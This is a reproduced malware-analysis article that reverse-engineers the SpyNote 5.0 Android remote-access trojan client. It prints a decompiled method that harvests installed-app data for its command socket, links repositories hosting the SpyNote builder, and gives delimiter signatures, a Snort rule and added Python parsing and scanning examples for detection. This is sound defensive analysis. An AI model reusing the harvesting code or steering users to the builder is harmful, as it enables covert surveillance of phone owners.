
How to perform reverse analysis of SpyNote5.0 Client_APK

王林
2023-05-22 16:18:30

1. What is SpyNote5.0?

SpyNote is a tool used to create Android malicious programs. Its feature set is striking, including but not limited to reading contacts, recording, executing commands, managing applications, keystroke logging, GPS positioning, and so on. These features are a key focus when researching Android malware. A preliminary understanding of its use can be gained from a series of earlier articles: "SpyNote V5.0 graphical tool remote management Android phone tutorial", "Be careful, the Android Trojan tool SpyNote is free! Remote monitoring is so simple", "Beware, Android remote control (spynote) has been upgraded...", and others.

2. Preparing Tools

Few people are interested in the reverse analysis of the SpyNote5.0 Client_APK. Below I briefly introduce the tools used, and then begin the reverse analysis process.

1. SpyNote5.0

Download address: https://github.com/soDLL/SpyNote OR https://github.com/miladzero/SpyNote

2. jadx-gui

Download address: https://github.com/skylot/jadx/releases

3. androidkiller

Download address: https://www.guguzhu.com/soft/270509.html

3. Start reverse analysis

We start by analyzing Client_APK. The usual approach is to drag the APK generated by the SpyNote client into AndroidKiller; once loaded, AndroidKiller automatically disassembles it and produces the analysis results.

On the left, the Activity, Receiver and Service components and the application permissions (uses-permission) are grouped by inheritance relationship; you can see that the client requests a large number of permissions. On the right are the smali disassembly window and the workbench. This tool displays permissions and inheritance relationships clearly, but because of its older version the code restoration is not complete enough, so I switched to jadx-gui, imported Client_APK, and continued the reverse engineering there.

We can see three packages: android.support, con.eset.ems2.gp and yps.eton.application. android.support is the Android support library, which includes the legacy, v4 and v7 packages. con.eset.ems2.gp is the configuration package, containing the host, client_name and other settings. yps.eton.application is the package we need to analyze.

Opening yps.eton.application reveals 14 classes. Since there is a lot of code to analyze, only some key code is examined in a targeted manner.

From the earlier AndroidKiller structure view, classes A, F, G and k extend Service, and a Service in Android is a component that keeps running in the background. Let's guess what Client_APK might need to keep running: presumably the key objects that stay active, are controlled, monitor the device, run multi-threaded, and so on. Our analysis focuses on some of its functions and on how to identify its traffic.

3.1 Command execution startup analysis

We start with A. It starts the service first, then traverses the R object and reads its third element: if that equals 1, j() is executed; otherwise it starts the service after checking whether a() has been instantiated. It then goes on to determine, via j(), whether it has root permissions.

Continuing with j(): it executes the su command and then writes "Do I have root?" to the file /system/sd/temporary.txt, in order to determine whether it has root permissions.

Next look at h(), which uses a separate thread to obtain the configuration parameters stored in the R object and uses a loop and a socket to send information back.

3.2 Partial functional analysis of Base64 encoding application

Looking at the import list of class A, it contains android.util.Base64, indicating that Base64 encoding is used at runtime. Searching for the keyword Base64 shows that it is applied to ((BitmapDrawable) applicationIcon).getBitmap(), i.e. to the application icon. The client separates fields with the delimiter c0c1c3a2c0c1c, terminates each record with 9xf89fff9xf89, and uses fxf0x4x4x0fxf between the command name and its payload, including exception information and options.


public void k() {
    new Thread(new Runnable() {
        public void run() {
            String str;
            try {
                StringBuffer stringBuffer = new StringBuffer();
                PackageManager packageManager = A.this.getApplicationContext().getPackageManager();
                for (ApplicationInfo applicationInfo : packageManager.getInstalledApplications(128)) {
                    // only packages that have a launcher intent are reported
                    if (packageManager.getLaunchIntentForPackage(applicationInfo.packageName) != null && !packageManager.getLaunchIntentForPackage(applicationInfo.packageName).equals("")) {
                        try {
                            Date date = new Date(packageManager.getPackageInfo(applicationInfo.packageName, 4096).firstInstallTime);
                            // FLAG_SYSTEM (1) decides whether the app is reported as "system" or "user"
                            String str2 = packageManager.getLaunchIntentForPackage(applicationInfo.packageName) != null ? (applicationInfo.flags & 1) == 1 ? "system" : "user" : "";
                            Drawable applicationIcon = packageManager.getApplicationIcon(applicationInfo.packageName);
                            String str3 = new String();
                            if (applicationIcon != null) {
                                // the icon is JPEG-compressed and Base64-encoded (flag 2 = NO_WRAP)
                                Bitmap bitmap = ((BitmapDrawable) applicationIcon).getBitmap();
                                ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
                                bitmap.compress(CompressFormat.JPEG, 50, byteArrayOutputStream);
                                str = Base64.encodeToString(byteArrayOutputStream.toByteArray(), 2);
                            } else {
                                str = str3;
                            }
                            // one record: label, package, icon, system/user, install date, client package, then the record terminator
                            stringBuffer.append(packageManager.getApplicationLabel(applicationInfo) + "c0c1c3a2c0c1c" + applicationInfo.packageName + "c0c1c3a2c0c1c" + str + "c0c1c3a2c0c1c" + str2 + "c0c1c3a2c0c1c" + date.toString() + "c0c1c3a2c0c1c" + A.this.getPackageName() + "9xf89fff9xf89");
                        } catch (NameNotFoundException e) {
                            A.this.h("applicationsfxf0x4x4x0fxf[My/Exception]" + e.getMessage().toString());
                        }
                    }
                }
                // the complete listing is handed to h(), which sends it over the socket
                A.this.h("applicationsfxf0x4x4x0fxf" + stringBuffer.toString());
            } catch (Exception e2) {
                A.this.h("applicationsfxf0x4x4x0fxf[My/Exception]" + e2.getMessage().toString());
            }
        }
    }).start();
}
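The record layout produced by k() can be decoded from a captured message. The following Python parser is an added example, not code from the article or from SpyNote: it splits a message on the three delimiters seen in the listing (fxf0x4x4x0fxf, 9xf89fff9xf89, c0c1c3a2c0c1c), Base64-decodes the icon field, distinguishes an exception reply from a normal listing, and rejects malformed records. The sample message, the icon bytes and the package names com.example.calc and com.example.settings are constructed for the example.

```python
import base64
from dataclasses import dataclass
from typing import List, Optional

# Delimiters recovered from the decompiled k() method of class A (see the listing above).
CMD_SEP = "fxf0x4x4x0fxf"      # separates the command name ("applications") from its payload
RECORD_END = "9xf89fff9xf89"   # terminates each installed-application record
FIELD_SEP = "c0c1c3a2c0c1c"    # separates the six fields inside one record
EXC_MARK = "[My/Exception]"    # payload prefix the client uses for an exception reply


@dataclass
class AppRecord:
    label: str
    package: str
    icon_jpeg: Optional[bytes]  # decoded JPEG bytes, or None when the client sent no icon
    kind: str                   # "system" or "user", derived from ApplicationInfo.flags
    first_install: str          # Date.toString() text, kept verbatim
    client_package: str         # package name of the SpyNote client that sent the message


@dataclass
class ApplicationsMessage:
    command: str
    records: List[AppRecord]
    error: Optional[str]        # set instead of records for an exception reply


def parse_applications_message(message: str) -> ApplicationsMessage:
    """Decode one captured 'applications' message into structured records."""
    command, sep, body = message.partition(CMD_SEP)
    if not sep:
        raise ValueError("no command separator present; not a SpyNote-style message")
    if body.startswith(EXC_MARK):
        return ApplicationsMessage(command, [], body[len(EXC_MARK):])
    records = []
    for raw in body.split(RECORD_END):
        if raw == "":
            continue  # the split leaves an empty element after the final terminator
        fields = raw.split(FIELD_SEP)
        if len(fields) != 6:
            raise ValueError(f"expected 6 fields, got {len(fields)} in {raw[:40]!r}")
        label, package, icon_b64, kind, installed, client = fields
        # Base64.encodeToString(..., 2) is NO_WRAP, so a plain decode suffices; an
        # empty string means getApplicationIcon() returned null for this package.
        icon = base64.b64decode(icon_b64) if icon_b64 else None
        records.append(AppRecord(label, package, icon, kind, installed, client))
    return ApplicationsMessage(command, records, None)


# Constructed sample in exactly the layout k() emits (not a real capture); the icon bytes
# only imitate a JPEG header and trailer.
FAKE_ICON = b"\xff\xd8\xff\xe0" + b"constructed-icon-bytes" + b"\xff\xd9"
SAMPLE_DATE = "Mon Jan 01 00:00:00 GMT 2023"


def build_sample_message() -> str:
    icon_b64 = base64.b64encode(FAKE_ICON).decode("ascii")
    rec1 = FIELD_SEP.join(["Calculator", "com.example.calc", icon_b64, "user",
                           SAMPLE_DATE, "yps.eton.application"])
    rec2 = FIELD_SEP.join(["Settings", "com.example.settings", "", "system",
                           SAMPLE_DATE, "yps.eton.application"])
    return "applications" + CMD_SEP + rec1 + RECORD_END + rec2 + RECORD_END


if __name__ == "__main__":
    msg = parse_applications_message(build_sample_message())
    for r in msg.records:
        size = len(r.icon_jpeg) if r.icon_jpeg else 0
        print(f"{r.kind:6} {r.package:22} {r.label:12} icon={size} bytes installed={r.first_install}")
    err = parse_applications_message("applications" + CMD_SEP + EXC_MARK + "sample failure")
    print("exception reply:", err.error)
```

Feeding the parser a real payload extracted from a capture (for example the TCP stream reassembled in Wireshark) gives the attacker's view of the victim's installed applications, which is useful when assessing what a compromised device disclosed.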

3.3 Partial functional analysis of information gathering

Class A contains a very long method b, which has so many switch/case branches that the decompiler throws an exception on it. From the comments it is not hard to see that most of the information-gathering logic is implemented there: for example Device info, System info, Sim info, WIFI info, etc., covering the functions the tool advertises.

Worth noting in the overridden method b is the part that obtains the storage path. Transmitted path information uses e1x1114x61114e as its delimiter, and file-name information uses -1c0c1c3a2c0c1c-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c as its separator. These strings make it possible to identify the client's operations on the wire more precisely.

4. Summary

During the analysis we can see how each function is implemented. Since the client transmits data unencrypted and merely Base64-encoded, its most notable feature is the appearance of the delimiters, which make the client's transmission behavior easy to recognize. So we capture packets during transmission.

The delimiter strings and the Base64-encoded content are clearly visible in the capture. Based on this, we can write Snort rules to identify the traffic. Example rule:

alert tcp any any -> any any (content:"fxf0x4x4x0fxf"; sid:1; msg:"SpyNote5.0 Client";)
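The delimiter strings recovered in sections 3.2 and 3.3, together with the content match in the Snort rule above, can also be checked against captured traffic outside Snort. The following Python scanner is an added example, not code from the article or from SpyNote: it searches a reassembled TCP stream for every delimiter the article lists, attributes each match to its meaning without double-counting the field separator that is nested inside the longer file-name separator, pulls out the command name that precedes fxf0x4x4x0fxf, and shows why matching packet by packet rather than on the reassembled stream can miss a delimiter that straddles a segment boundary. The sample stream, the package name com.example.calc and the command name "storage" are constructed for the example.

```python
import re
from typing import List, NamedTuple, Tuple

# Delimiters the article recovers from the decompiled client, longest first so that the
# plain field separator (a substring of the file-name separator) is not counted twice.
SIGNATURES: List[Tuple[str, str]] = [
    ("-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c", "file-name separator in directory listings"),
    ("e1x1114x61114e", "path delimiter in storage-path replies"),
    ("fxf0x4x4x0fxf", "command/payload separator (the Snort content match above)"),
    ("9xf89fff9xf89", "record terminator in the applications listing"),
    ("c0c1c3a2c0c1c", "field separator inside a record"),
]
CMD_SEP = b"fxf0x4x4x0fxf"


class Hit(NamedTuple):
    offset: int
    delimiter: str
    meaning: str
    command: str  # command name preceding fxf0x4x4x0fxf; "" for the other delimiters


def scan_stream(data: bytes) -> List[Hit]:
    """Locate every known delimiter in a reassembled stream, without nested double counts."""
    claimed: List[Tuple[int, int]] = []  # spans already attributed to a longer delimiter
    hits: List[Hit] = []
    for delim, meaning in SIGNATURES:
        needle = delim.encode("ascii")
        start = 0
        while (i := data.find(needle, start)) >= 0:
            end = i + len(needle)
            if not any(s <= i and end <= e for s, e in claimed):
                command = ""
                if needle == CMD_SEP:
                    # the command name is the run of letters immediately before the separator
                    m = re.search(rb"[A-Za-z]+$", data[:i])
                    command = m.group(0).decode("ascii") if m else ""
                hits.append(Hit(i, delim, meaning, command))
                claimed.append((i, end))
            start = end
    return sorted(hits)


def commands_seen(data: bytes) -> List[str]:
    """Command names in the order the client sent them."""
    return [h.command for h in scan_stream(data) if h.command]


def scan_per_segment(segments: List[bytes]) -> List[Hit]:
    """Packet-by-packet matching; a delimiter cut by a segment boundary is missed."""
    return [h for seg in segments for h in scan_stream(seg)]


# Constructed sample stream, not a real capture: an applications reply (one record, no icon)
# followed by a storage-path reply; "storage" is a hypothetical command name.
SAMPLE_STREAM = (
    b"applicationsfxf0x4x4x0fxf"
    b"Calculatorc0c1c3a2c0c1ccom.example.calcc0c1c3a2c0c1cc0c1c3a2c0c1cuser"
    b"c0c1c3a2c0c1cMon Jan 01 00:00:00 GMT 2023c0c1c3a2c0c1cyps.eton.application9xf89fff9xf89"
    b"storagefxf0x4x4x0fxf/sdcard/DCIMe1x1114x61114e"
    b"a.jpg-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c-1c0c1c3a2c0c1cb.jpg"
)
# Split the stream so that the second fxf0x4x4x0fxf straddles the segment boundary.
_cut = SAMPLE_STREAM.index(b"storagefxf0x4x4x0fxf") + len(b"storagefxf0x4")
SAMPLE_SEGMENTS = [SAMPLE_STREAM[:_cut], SAMPLE_STREAM[_cut:]]


if __name__ == "__main__":
    for h in scan_stream(SAMPLE_STREAM):
        tag = f" command={h.command}" if h.command else ""
        print(f"{h.offset:4d} {h.delimiter:45} {h.meaning}{tag}")
    print("reassembled:", commands_seen(SAMPLE_STREAM))
    print("per segment:", [h.command for h in scan_per_segment(SAMPLE_SEGMENTS) if h.command])
```

The per-segment comparison is the practical caveat when turning these strings into detection: a content match should be evaluated on the reassembled stream, and because the delimiters are plain text with no framing of their own, the command name in front of fxf0x4x4x0fxf is what tells the analyst which client function produced the traffic.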


Statement:
This article is reproduced from yisu.com. If there is any infringement, please contact admin@php.cn for deletion.